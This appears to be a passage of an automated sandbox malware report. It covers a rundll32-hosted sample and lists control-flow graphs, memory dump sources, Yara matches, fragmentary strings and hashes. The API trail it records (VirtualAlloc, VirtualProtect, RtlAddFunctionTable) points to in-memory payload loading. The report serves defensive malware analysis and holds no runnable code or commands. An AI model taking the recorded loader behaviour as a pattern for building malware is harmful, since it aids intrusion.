                                                                    execution_graph 3264 13444f80000 3265 13444f80183 3264->3265 3266 13444f8043e VirtualAlloc 3265->3266 3270 13444f80462 3266->3270 3267 13444f80a7b 3268 13444f80531 GetNativeSystemInfo 3268->3267 3269 13444f8056d VirtualAlloc 3268->3269 3273 13444f8058b 3269->3273 3270->3267 3270->3268 3271 13444f80a00 3271->3267 3272 13444f80a56 RtlAddFunctionTable 3271->3272 3272->3267 3273->3271 3274 13444f809d9 VirtualProtect 3273->3274 3274->3273

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 0 13444f80000-13444f80460 call 13444f80aa8 * 2 VirtualAlloc 22 13444f80462-13444f80466 0->22 23 13444f8048a-13444f80494 0->23 24 13444f80468-13444f80488 22->24 26 13444f80a91-13444f80aa6 23->26 27 13444f8049a-13444f8049e 23->27 24->23 24->24 27->26 28 13444f804a4-13444f804a8 27->28 28->26 29 13444f804ae-13444f804b2 28->29 29->26 30 13444f804b8-13444f804bf 29->30 30->26 31 13444f804c5-13444f804d2 30->31 31->26 32 13444f804d8-13444f804e1 31->32 32->26 33 13444f804e7-13444f804f4 32->33 33->26 34 13444f804fa-13444f80507 33->34 35 13444f80531-13444f80567 GetNativeSystemInfo 34->35 36 13444f80509-13444f80511 34->36 35->26 38 13444f8056d-13444f80589 VirtualAlloc 35->38 37 13444f80513-13444f80518 36->37 39 13444f80521 37->39 40 13444f8051a-13444f8051f 37->40 41 13444f805a0-13444f805ac 38->41 42 13444f8058b-13444f8059e 38->42 43 13444f80523-13444f8052f 39->43 40->43 44 13444f805af-13444f805b2 41->44 42->41 43->35 43->37 46 13444f805c1-13444f805db 44->46 47 13444f805b4-13444f805bf 44->47 48 13444f805dd-13444f805e2 46->48 49 13444f8061b-13444f80622 46->49 47->44 50 13444f805e4-13444f805ea 48->50 51 13444f80628-13444f8062f 49->51 52 13444f806db-13444f806e2 49->52 53 13444f805ec-13444f80609 50->53 54 13444f8060b-13444f80619 50->54 51->52 55 13444f80635-13444f80642 51->55 56 13444f80864-13444f8086b 52->56 57 13444f806e8-13444f806f9 52->57 53->53 53->54 54->49 54->50 55->52 60 13444f80648-13444f8064f 55->60 58 13444f80871-13444f8087f 56->58 59 13444f80917-13444f80929 56->59 61 13444f80702-13444f80705 57->61 64 13444f8090e-13444f80911 58->64 62 13444f8092f-13444f80937 59->62 63 13444f80a07-13444f80a1a 59->63 65 13444f80654-13444f80658 60->65 66 13444f80707-13444f8070a 61->66 67 13444f806fb-13444f806ff 61->67 69 13444f8093b-13444f8093f 62->69 90 13444f80a1c-13444f80a27 63->90 91 13444f80a40-13444f80a4a 63->91 64->59 68 13444f80884-13444f808a9 64->68 70 13444f806c0-13444f806ca 65->70 71 13444f8070c-13444f8071d 66->71 72 13444f80788-13444f8078e 66->72 67->61 95 13444f80907-13444f8090c 68->95 96 13444f808ab-13444f808b1 68->96 75 13444f809ec-13444f809fa 69->75 76 13444f80945-13444f8095a 69->76 73 13444f806cc-13444f806d2 70->73 74 13444f8065a-13444f80669 70->74 77 13444f8071f-13444f80720 71->77 78 13444f80794-13444f807a2 71->78 72->78 73->65 82 13444f806d4-13444f806d5 73->82 86 13444f8067a-13444f8067e 74->86 87 13444f8066b-13444f80678 74->87 75->69 88 13444f80a00-13444f80a01 75->88 84 13444f8095c-13444f8095e 76->84 85 13444f8097b-13444f8097d 76->85 89 13444f80722-13444f80784 77->89 80 13444f8085d-13444f8085e 78->80 81 13444f807a8 78->81 80->56 92 13444f807ae-13444f807d4 81->92 82->52 97 13444f8096e-13444f80979 84->97 98 13444f80960-13444f8096c 84->98 100 13444f8097f-13444f80981 85->100 101 13444f809a2-13444f809a4 85->101 102 13444f8068c-13444f80690 86->102 103 13444f80680-13444f8068a 86->103 99 13444f806bd-13444f806be 87->99 88->63 89->89 104 13444f80786 89->104 105 13444f80a38-13444f80a3e 90->105 93 13444f80a4c-13444f80a54 91->93 94 13444f80a7b-13444f80a8e 91->94 127 13444f80835-13444f80839 92->127 128 13444f807d6-13444f807d9 92->128 93->94 107 13444f80a56-13444f80a79 RtlAddFunctionTable 93->107 94->26 95->64 116 13444f808b3-13444f808b9 96->116 117 13444f808bb-13444f808c8 96->117 108 13444f809be-13444f809bf 97->108 98->108 99->70 109 13444f80983-13444f80987 100->109 110 13444f80989-13444f8098b 100->110 114 13444f809ac-13444f809bb 101->114 115 13444f809a6-13444f809aa 101->115 112 13444f80692-13444f806a3 102->112 113 13444f806a5-13444f806a9 102->113 111 13444f806b6-13444f806ba 103->111 104->78 105->91 106 13444f80a29-13444f80a35 105->106 106->105 107->94 122 13444f809c5-13444f809cb 108->122 109->108 110->101 120 13444f8098d-13444f8098f 110->120 111->99 112->111 113->99 121 13444f806ab-13444f806b3 113->121 114->108 115->108 123 13444f808ea-13444f808fe 116->123 124 13444f808d3-13444f808e5 117->124 125 13444f808ca-13444f808d1 117->125 129 13444f80991-13444f80997 120->129 130 13444f80999-13444f809a0 120->130 121->111 131 13444f809cd-13444f809d3 122->131 132 13444f809d9-13444f809e9 VirtualProtect 122->132 123->95 138 13444f80900-13444f80905 123->138 124->123 125->124 125->125 135 13444f80844-13444f80850 127->135 136 13444f8083b 127->136 133 13444f807e3-13444f807f0 128->133 134 13444f807db-13444f807e1 128->134 129->108 130->122 131->132 132->75 140 13444f807f2-13444f807f9 133->140 141 13444f807fb-13444f8080d 133->141 139 13444f80812-13444f8082c 134->139 135->92 142 13444f80856-13444f80857 135->142 136->135 138->96 139->127 144 13444f8082e-13444f80833 139->144 140->140 140->141 141->139 142->80 144->128
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.398812249.0000013444F80000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000013444F80000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_13444f80000_rundll32.jbxd
                                                                    Similarity
                                                                    • API ID: Virtual$Alloc$FunctionInfoNativeProtectSystemTable
                                                                    • String ID: Cach$Find$Flus$Free$GetN$Libr$Load$Load$Lock$Reso$Reso$Reso$Reso$RtlA$Size$Slee$Virt$Virt$aryA$ativ$ddFu$eSys$hIns$lloc$ncti$ofRe$onTa$rote$sour$temI$tion$truc$ualA$ualP$urce$urce$urce$urce
                                                                    • API String ID: 394283112-2517549848
                                                                    • Opcode ID: 590c178917582490f2a8474f3428d2fdec128c188f960b73743dba758a98ecc8
                                                                    • Instruction ID: 4f0b4efdf5e04b55533d5d0074668bd336050d681c6a6759f94a975c93b7d2b2
                                                                    • Opcode Fuzzy Hash: 590c178917582490f2a8474f3428d2fdec128c188f960b73743dba758a98ecc8
                                                                    • Instruction Fuzzy Hash: 8E72C030618B488FDB69DF18C8857F9B7E0FB98314F51462DE88AD7251DB34E642CB86
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Control-flow Graph

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.398034910.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_180001000_rundll32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: #C$(I$-:$Ekf$<W$Z$l$l
                                                                    • API String ID: 0-464535774
                                                                    • Opcode ID: d8792019bb8cd892c5e2cff0ba87425d7977148afb5a5f987cda1e45d5ff9126
                                                                    • Instruction ID: edc4d0e98499d5b5adff65828f8d1fd2ac7ce79502a6533da94e18623254a36a
                                                                    • Opcode Fuzzy Hash: d8792019bb8cd892c5e2cff0ba87425d7977148afb5a5f987cda1e45d5ff9126
                                                                    • Instruction Fuzzy Hash: C102E3B151038CDBCB99DF28C8CAADD3BA1FB48398F956219FD0697260D774D884CB85
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 180 180010ff4-180011016 181 180011020 180->181 182 180011022-180011028 181->182 183 180011814 182->183 184 18001102e-180011034 182->184 185 180011819-18001181f 183->185 186 1800114e2-1800114ec 184->186 187 18001103a-180011040 184->187 185->182 188 180011825-180011832 185->188 191 1800114f5-18001151d 186->191 192 1800114ee-1800114f3 186->192 189 1800113e2-1800114d2 call 180008200 187->189 190 180011046-18001104c 187->190 189->188 199 1800114d8-1800114dd 189->199 190->185 194 180011052-18001120b call 180021040 call 1800291ac 190->194 195 180011523-1800117f4 call 180016314 call 1800291ac call 18001e2bc 191->195 192->195 207 180011212-1800113d7 call 1800291ac call 18001e2bc 194->207 208 18001120d 194->208 209 1800117f9-180011803 195->209 199->182 207->188 215 1800113dd 207->215 208->207 209->188 212 180011805-18001180f 209->212 212->182 215->181
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.398034910.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_180001000_rundll32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: )|x$/Zb$/v|$OV4T$\$lA
                                                                    • API String ID: 0-3528011396
                                                                    • Opcode ID: 74ea3d61a93069fa3a56a5f8f60d4b0c7eeb5b014d6ac06c6862fd203c8e6463
                                                                    • Instruction ID: 5dbdb21e6b24644f90705741d0e2e2cc24c858ca1caac6c8284349b4f9dc1789
                                                                    • Opcode Fuzzy Hash: 74ea3d61a93069fa3a56a5f8f60d4b0c7eeb5b014d6ac06c6862fd203c8e6463
                                                                    • Instruction Fuzzy Hash: 8C2204705097C8CBDBBECF64C885BDA7BA8FB44B08F10521DEA4A9E258DB745744CB41
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 216 180021618-180021653 217 180021655-18002165a 216->217 218 180021bf3-180021c25 217->218 219 180021660-180021665 217->219 220 180021c2a-180021c2f 218->220 221 180021a81-180021bda call 180016314 219->221 222 18002166b-180021670 219->222 224 180021838-180021845 220->224 225 180021c35 220->225 228 180021bdf-180021bee 221->228 226 1800219f3-180021a7c call 180001b1c 222->226 227 180021676-18002167b 222->227 225->217 226->217 229 1800219e4-1800219ee 227->229 230 180021681-180021686 227->230 228->217 229->217 232 1800219d5-1800219df call 18001dfb4 230->232 233 18002168c-180021691 230->233 232->217 235 180021697-18002169c 233->235 236 18002190c-1800219a5 call 18000abac 233->236 239 1800216a2-1800216a7 235->239 240 180021846-180021907 call 180021434 235->240 243 1800219aa-1800219b0 236->243 239->220 244 1800216ad-180021835 call 180008200 call 1800166c0 239->244 240->217 246 1800219b2-1800219c6 243->246 247 1800219cb-1800219d0 243->247 244->224 246->217 247->217
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.398034910.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_180001000_rundll32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: $&.+$)O$.pN$F>9$t(/
                                                                    • API String ID: 0-3036092626
                                                                    • Opcode ID: 549a8b626face2190b4149bba4d09d4cb88f6d29378e8937dde350adb7fd5a83
                                                                    • Instruction ID: e4baced68933c0a0796cf32b330105f1a6d3ed4de4784e8c7f389f9334031704
                                                                    • Opcode Fuzzy Hash: 549a8b626face2190b4149bba4d09d4cb88f6d29378e8937dde350adb7fd5a83
                                                                    • Instruction Fuzzy Hash: E6E109716093C89FEBBACF24C8897DE7BA1FB59344F50421DD88A8E250DB745B49CB42
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 252 18000c608-18000c62d 253 18000c632-18000c637 252->253 254 18000cc8a-18000cc8f 253->254 255 18000c63d 253->255 256 18000cc95-18000cc9a 254->256 257 18000cf2b-18000cfaf call 18001f7c0 call 18001c32c 254->257 258 18000c643-18000c648 255->258 259 18000cb7d-18000cc23 call 1800269b0 call 18001c32c 255->259 261 18000ce33-18000ced7 call 180008ad8 call 18001c32c 256->261 262 18000cca0-18000cca5 256->262 285 18000cfb4-18000d00a call 1800194a4 257->285 263 18000caa5-18000cb78 call 1800176b8 call 18001c32c call 1800194a4 258->263 264 18000c64e-18000c653 258->264 286 18000cc28-18000cc85 call 1800194a4 259->286 300 18000cedc-18000cf26 call 1800194a4 261->300 268 18000cd35-18000cdce call 18000703c call 18001c32c 262->268 269 18000ccab-18000ccb0 262->269 263->253 271 18000c9c1-18000ca52 call 18002870c call 18001c32c 264->271 272 18000c659-18000c65e 264->272 305 18000cdd3-18000ce2e call 1800194a4 268->305 279 18000ccb6-18000cd30 call 180021434 269->279 280 18000d00f-18000d014 269->280 308 18000ca57-18000caa0 call 1800194a4 271->308 282 18000c664-18000c669 272->282 283 18000c8bb-18000c963 call 180002610 call 18001c32c 272->283 279->253 280->253 288 18000d01a-18000d020 280->288 292 18000c7b2-18000c85a call 180019618 call 18001c32c 282->292 293 18000c66f-18000c674 282->293 316 18000c968-18000c9bc call 1800194a4 283->316 285->280 286->253 325 18000c85f-18000c8b6 call 1800194a4 292->325 293->280 303 18000c67a-18000c73d call 180002178 call 18001c32c 293->303 300->253 326 18000c742-18000c7ad call 1800194a4 303->326 305->253 308->253 316->253 325->253 326->253
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.398034910.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_180001000_rundll32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: +#;)$K'$sf$w\H
                                                                    • API String ID: 0-1051058546
                                                                    • Opcode ID: 6c53062de77b202a7a918e5f4038520a98252693d28bf41343123917f80ba32c
                                                                    • Instruction ID: 30c6111824d62709d88844cae5ccd518ea343406d57bec7882368cdc1c6a6611
                                                                    • Opcode Fuzzy Hash: 6c53062de77b202a7a918e5f4038520a98252693d28bf41343123917f80ba32c
                                                                    • Instruction Fuzzy Hash: 8362F97050068D8FDB48DF28C89A6DD3FA1FB58388F524229FC4AA7251D778D999CBC4
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Control-flow Graph

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.398034910.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_180001000_rundll32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: <4P$<8$<w.
                                                                    • API String ID: 0-1030867500
                                                                    • Opcode ID: 6c4ff939f0d35883aefbb319d4430fd67387b4e339adb0f797cabce8c6a4bf31
                                                                    • Instruction ID: 97d266913d6b0fd63d839b3c54903fd41a2ccd22a8a26fffcb9587bfe3b6431f
                                                                    • Opcode Fuzzy Hash: 6c4ff939f0d35883aefbb319d4430fd67387b4e339adb0f797cabce8c6a4bf31
                                                                    • Instruction Fuzzy Hash: C8B1E17151A384ABD788CF28C1C994BBBE1FBD4754F906A1DF8C68B260D7B0D948CB02
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Control-flow Graph

                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.398034910.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_180001000_rundll32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 9400724a362ecc304d993d2fe4c896d101fab294f6d1cf34a07a96bc2a8ce181
                                                                    • Instruction ID: 281782cf28aa09d34d334260f991d1b96cfbd8271b51b9b7c31761fd0664cb75
                                                                    • Opcode Fuzzy Hash: 9400724a362ecc304d993d2fe4c896d101fab294f6d1cf34a07a96bc2a8ce181
                                                                    • Instruction Fuzzy Hash: 4B51EC715087889BCBB8DF18C9856CA7BF0FF95704F50891DE9898B250DF719A44DB42
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 358 180022010-18002203b 359 18002203d-180022043 358->359 360 180022338-1800223a1 call 18001455c 359->360 361 180022049-18002204f 359->361 368 1800223a6-1800223ac 360->368 362 180022055-18002205b 361->362 363 18002232e-180022333 361->363 366 180022061-180022067 362->366 367 1800222be-180022329 call 180019cb4 362->367 363->359 370 180022069-18002206f 366->370 371 18002209a-1800222b9 call 18001dbe8 call 180012320 call 1800194a4 366->371 367->359 368->359 372 1800223b2-1800223c2 368->372 370->368 375 180022075-180022083 370->375 371->368 376 180022089-18002208d 375->376 378 180022085-180022086 376->378 379 18002208f-180022098 376->379 378->376 379->359
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.398034910.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_180001000_rundll32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: "+H$1l7.$M8;$]$d$]k$]k$94
                                                                    • API String ID: 0-2447245168
                                                                    • Opcode ID: 3fd6bef9004380659c47559ba6e3d81fe5eea7f701e849f333ef0deba45e7d13
                                                                    • Instruction ID: 1221e244f5383d3e6569bf50eb566ee92e7d288cf12f4405919b94e37960c7a7
                                                                    • Opcode Fuzzy Hash: 3fd6bef9004380659c47559ba6e3d81fe5eea7f701e849f333ef0deba45e7d13
                                                                    • Instruction Fuzzy Hash: 3FB10D7160130CCBDBA9DF28C18A6DA3BE1FF48748F114129FD1A97261D774E919CB46
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 568 1800059b8-180005a02 569 180005a04-180005a09 568->569 570 180006107-1800061a6 call 180001b1c 569->570 571 180005a0f-180005a14 569->571 583 1800061ab-1800061b0 570->583 572 180005a1a-180005a1f 571->572 573 180005fcd-180006102 call 180016314 571->573 576 180005a25-180005a2a 572->576 577 180005da6-180005fb1 call 1800093f0 572->577 573->569 581 1800061bb-18000625a call 180001b1c 576->581 582 180005a30-180005a35 576->582 590 180005fc3-180005fc8 577->590 591 180005fb3-180005fbe 577->591 588 18000625f-180006271 581->588 585 180005a3b-180005a40 582->585 586 180005d7e-180005d8c 582->586 587 1800061b6 583->587 583->588 592 180005a46-180005a4b 585->592 593 180005b78-180005d79 call 180009f5c call 18000a62c call 1800194a4 585->593 594 180005d92-180005d96 586->594 587->569 590->569 591->569 598 180005a51-180005a56 592->598 599 180005ad8-180005b68 call 18000abac 592->599 593->569 595 180005d98-180005da1 594->595 596 180005d8e-180005d8f 594->596 595->569 596->594 598->583 602 180005a5c-180005ad3 call 180007958 598->602 599->588 607 180005b6e-180005b73 599->607 602->569 607->569
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.398034910.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_180001000_rundll32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: -!zt$Mv`b$R3T$d}9J$t:v$ru
                                                                    • API String ID: 0-2100131636
                                                                    • Opcode ID: e0551372703c1c57f1fc0d9d1de0f1be02ef62f192bed394747547d409ac2d0a
                                                                    • Instruction ID: abddbd47ac15f5a8ffacaf8e31a06efd054a3dbd2afb1a66e8bbaa14beb483a4
                                                                    • Opcode Fuzzy Hash: e0551372703c1c57f1fc0d9d1de0f1be02ef62f192bed394747547d409ac2d0a
                                                                    • Instruction Fuzzy Hash: C1221BB050478C8BDBB8CF64C9897DD7BB0FB44308F10862DDA5AAB250CBB45686CF59
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 611 180013780-1800137f4 call 1800142a0 614 1800137fb-180013800 611->614 615 180013806-18001380b 614->615 616 180013c55-180013ce4 call 18002620c 614->616 617 180013811-180013816 615->617 618 180013c4b-180013c50 615->618 625 180013ce6-180013ceb 616->625 626 180013cf0 616->626 620 18001381c-180013821 617->620 621 1800138cd-180013c46 call 180006664 call 18000bb28 call 18002a6c8 call 1800194a4 617->621 618->614 623 180013cf5-180013cfa 620->623 624 180013827-1800138a9 call 18000290c 620->624 621->614 629 1800138ae-1800138cc 623->629 630 180013d00 623->630 624->629 625->614 626->623 630->614
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.398034910.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_180001000_rundll32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: $$"`2$lbzZ$lmq$tro$kO
                                                                    • API String ID: 0-2401169580
                                                                    • Opcode ID: b22a75222821f6640e36d1476563fd6974371582067e8c17588d676730c46316
                                                                    • Instruction ID: 279b0f6eedbbacd77816cba7ac57bf6919de5fbe0bc464da326619847ce4fcd1
                                                                    • Opcode Fuzzy Hash: b22a75222821f6640e36d1476563fd6974371582067e8c17588d676730c46316
                                                                    • Instruction Fuzzy Hash: BBF1C3709047488FDBA8DFA8D9867DDBBB1FB48304F20821DD84AEB255DB749A49CF41
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Control-flow Graph

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.398034910.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_180001000_rundll32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: )#?$EX.$PT$UbA$2f
                                                                    • API String ID: 0-1318892062
                                                                    • Opcode ID: f9a85fa51538b1a6c0e22373df85dddbbc427f24166f886711afb0f01761c199
                                                                    • Instruction ID: a9b5704be98d3dd027f678fe08c59eda011257bdda9cf4ed25ea0f7660729633
                                                                    • Opcode Fuzzy Hash: f9a85fa51538b1a6c0e22373df85dddbbc427f24166f886711afb0f01761c199
                                                                    • Instruction Fuzzy Hash: 8B320DB190078C8BDBB8CF64C8856DD7BF0FB48318F50852DEA1A9B251DBB45685CF98
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 676 18001fc0c-18001fc44 call 1800142a0 679 18001fc46-18001fc4b 676->679 680 18001fc51 679->680 681 18001ff13-18001ff18 679->681 682 18001fe94-18001ff0e call 180012598 680->682 683 18001fc57-18001fc5c 680->683 684 180020169-1800201f9 call 1800190d4 681->684 685 18001ff1e-18001ff23 681->685 682->679 687 18001fc62-18001fc67 683->687 688 18001fde5-18001fe8f call 180012598 683->688 702 1800201fe-180020203 684->702 689 1800200b6-180020164 call 180012598 685->689 690 18001ff29-18001ff2e 685->690 695 18002020a-18002026b call 1800190d4 687->695 696 18001fc6d-18001fc72 687->696 688->679 689->679 698 1800200a1-1800200b1 call 1800014f8 690->698 699 18001ff34-18001ff39 690->699 711 180020270-180020291 695->711 706 18001fc78-18001fc7d 696->706 707 18001fd57-18001fde0 call 180012598 696->707 698->679 700 180020003-180020091 call 180021434 699->700 701 18001ff3f-18001ff44 699->701 700->711 723 180020097-18002009c 700->723 701->702 709 18001ff4a-18001fffe call 180012598 701->709 710 180020205 702->710 702->711 715 18001fc83-18001fc88 706->715 716 18001fd1f-18001fd52 706->716 707->679 709->679 710->679 715->702 720 18001fc8e-18001fd1a call 18001e938 715->720 716->679 720->679 723->679
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.398034910.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_180001000_rundll32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: $T$?F$QP|m$qjf$tZp
                                                                    • API String ID: 0-3477398917
                                                                    • Opcode ID: a2afc25ca6c2e6ca488c7a804df3743aa45b21aa43371557c2da8ddda12b60f7
                                                                    • Instruction ID: e54beaa769b94aae3cb673a52a2b60ade73482c6e5d3d936cdc9b6ae13d51efd
                                                                    • Opcode Fuzzy Hash: a2afc25ca6c2e6ca488c7a804df3743aa45b21aa43371557c2da8ddda12b60f7
                                                                    • Instruction Fuzzy Hash: 0B122870A0470CDFCF69DFA8C08A6DDBBF2FB44344F1091A9E816AB261D7759A19CB41
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.398034910.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_180001000_rundll32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: JQ$k&($t$v$x\J
                                                                    • API String ID: 0-1134872184
                                                                    • Opcode ID: e2b118cac14b957c819117e18deb076f69f9d4e25580e92a2151fd03385e5a66
                                                                    • Instruction ID: 7c1fd17b310acde7e359d6be57bcfb6c2dd011f2caef592e77d3cba241376f6b
                                                                    • Opcode Fuzzy Hash: e2b118cac14b957c819117e18deb076f69f9d4e25580e92a2151fd03385e5a66
                                                                    • Instruction Fuzzy Hash: F312E0B0504709EFCB99DF28C18AADE7BF0FB48308F40812AF80A9B254D774DA58DB45
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.398034910.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_180001000_rundll32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: R$)H8$?rIc$L==$V
                                                                    • API String ID: 0-2512384441
                                                                    • Opcode ID: 0d280c2f9ee604a9d8763362a2e2c249d7a205bc5c068130deea404b5e8e02a7
                                                                    • Instruction ID: 6f6f9af97a41f07aad9f9d1cbd67af5334817a93c453241fb2a5d498ae2065c2
                                                                    • Opcode Fuzzy Hash: 0d280c2f9ee604a9d8763362a2e2c249d7a205bc5c068130deea404b5e8e02a7
                                                                    • Instruction Fuzzy Hash: 3541D0B090074E8BCF48CF64D49A5DE7FB0FB68398F20421DE856A6250D3B896A5CFC5
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.398034910.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_180001000_rundll32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: Qq$bt$vird$+$S
                                                                    • API String ID: 0-3373980505
                                                                    • Opcode ID: 46bb33aa035ecbbdf74cf68df8db4d7c020810c30b71dbb4fbdebc27907f7b4b
                                                                    • Instruction ID: 8c34661c01ca41a1498f33dadfb9b2381b3c020394efcb6cfebc1cbd8490f91c
                                                                    • Opcode Fuzzy Hash: 46bb33aa035ecbbdf74cf68df8db4d7c020810c30b71dbb4fbdebc27907f7b4b
                                                                    • Instruction Fuzzy Hash: 8831C2B081038A8FDB45CF64C88A5DE7BF0FB58358F115A19F869A6250D3B4D668CF81
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.398034910.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_180001000_rundll32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: V$@$P9$^_"
                                                                    • API String ID: 0-1880944046
                                                                    • Opcode ID: 14fe4b6354f8c882e246ec0bcf45ce0c6e4a33b057813c2d4cef38f5cb1d7b15
                                                                    • Instruction ID: ef3f81825b514374c5d287d432cdf068934c0dc0259921085eace1de493a05f6
                                                                    • Opcode Fuzzy Hash: 14fe4b6354f8c882e246ec0bcf45ce0c6e4a33b057813c2d4cef38f5cb1d7b15
                                                                    • Instruction Fuzzy Hash: B6F1DF70504749EFCB98CF28D18AACE7BE0FB48348F50812AF81A9B264D770DA59DB45
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
